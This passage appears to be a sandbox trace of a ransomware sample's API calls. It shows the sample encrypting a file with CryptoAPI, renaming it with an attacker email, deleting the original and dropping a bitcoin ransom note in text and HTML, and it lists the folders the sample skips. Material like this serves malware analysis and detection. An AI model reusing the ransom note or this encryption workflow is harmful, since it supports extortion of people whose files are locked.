.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0174.394] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0174.394] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0174.394] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0174.395] ReadFile (in: hFile=0x390, lpBuffer=0xfdcd58, nNumberOfBytesToRead=0x10f, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdcd58*, lpNumberOfBytesRead=0x18a640*=0x10f, lpOverlapped=0x0) returned 1
	[0174.398] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.398] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb220) returned 1
	[0174.400] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.400] CryptCreateHash (in: hProv=0xfcb220, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0174.400] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.400] CryptHashData (hHash=0xfb9570, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0174.400] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.400] CryptDeriveKey (in: hProv=0xfcb220, Algid=0x6610, hBaseData=0xfb9570, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb90b0) returned 1
	[0174.401] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.401] CryptEncrypt (in: hKey=0xfb90b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x10f, dwBufLen=0x10f | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x110) returned 1
	[0174.402] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0174.402] RtlMoveMemory (in: Destination=0xfdc6a8, Source=0xfdcd58, Length=0x10f | out: Destination=0xfdc6a8) 
	[0174.402] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.402] CryptEncrypt (in: hKey=0xfb90b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdc6a8*, pdwDataLen=0x18a1ec*=0x10f, dwBufLen=0x110 | out: pbData=0xfdc6a8*, pdwDataLen=0x18a1ec*=0x110) returned 1
	[0174.403] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.403] CryptDestroyKey (hKey=0xfb90b0) returned 1
	[0174.403] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.403] CryptDestroyHash (hHash=0xfb9570) returned 1
	[0174.403] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.403] CryptReleaseContext (hProv=0xfcb220, dwFlags=0x0) returned 1
	[0174.403] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0174.404] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0174.404] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.405] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0174.406] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 142
	[0174.406] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0174.407] WriteFile (in: hFile=0x39c, lpBuffer=0xfdc6a8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfdc6a8*, lpNumberOfBytesWritten=0x18a648*=0x110, lpOverlapped=0x0) returned 1
	[0174.410] CloseHandle (hObject=0x39c) returned 1
	[0174.410] CloseHandle (hObject=0x390) returned 1
	[0174.410] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml")) returned 1
	[0174.414] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml")) returned 0
	[0174.414] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 1
	[0174.414] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 0
	[0174.414] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0174.415] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0174.415] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}"
	[0174.415] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*"
	[0174.415] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0174.415] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0174.416] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\HELP_DECRYPT_YOUR_FILES.TXT") returned 108
	[0174.416] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0174.425] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0174.425] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0174.428] CloseHandle (hObject=0x388) returned 1
	[0174.429] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0174.429] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.429] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0174.430] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0174.430] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0174.431] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0174.431] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0174.431] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0174.431] CloseHandle (hObject=0x388) returned 1
	[0174.432] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0174.433] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0174.433] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0174.433] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\HELP_DECRYPT_YOUR_FILES.HTML") returned 109
	[0174.433] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0174.434] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0174.434] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0174.437] CloseHandle (hObject=0x388) returned 1
	[0174.437] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0174.438] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0174.438] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.438] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0174.440] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0174.440] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0174.440] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0174.440] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0174.440] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0174.441] CloseHandle (hObject=0x388) returned 1
	[0174.441] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x817c4737, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8181100e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0174.441] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*") returned 84
	[0174.441] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0174.442] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", cchLength=0x54 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*") returned 0x54
	[0174.442] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.442] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="windows") returned 0x0
	[0174.442] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.442] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="boot") returned 0x0
	[0174.442] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.442] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="system volume information") returned 0x0
	[0174.443] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.443] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0174.443] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.443] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="temp") returned 0x0
	[0174.443] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.443] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="program files") returned 0x0
	[0174.443] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.444] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0174.444] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.444] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="appdata") returned 0x0
	[0174.444] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.444] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="application data") returned 0x0
	[0174.444] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.444] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="winnt") returned 0x0
	[0174.445] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.445] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="tmp") returned 0x0
	[0174.445] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.445] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="cache") returned 0x0
	[0174.445] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.445] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0174.445] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.445] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="webcache") returned 0x0
	[0174.446] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.446] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="inetcache") returned 0x0
	[0174.446] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.446] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="nvidia") returned 0x0
	[0174.446] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.446] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="packages") returned 0x0
	[0174.446] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.447] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="cookies") returned 0x0
	[0174.447] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.447] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="programdata") returned 0x0
	[0174.447] lstrcmpW (lpString1=".", lpString2="..") returned -1
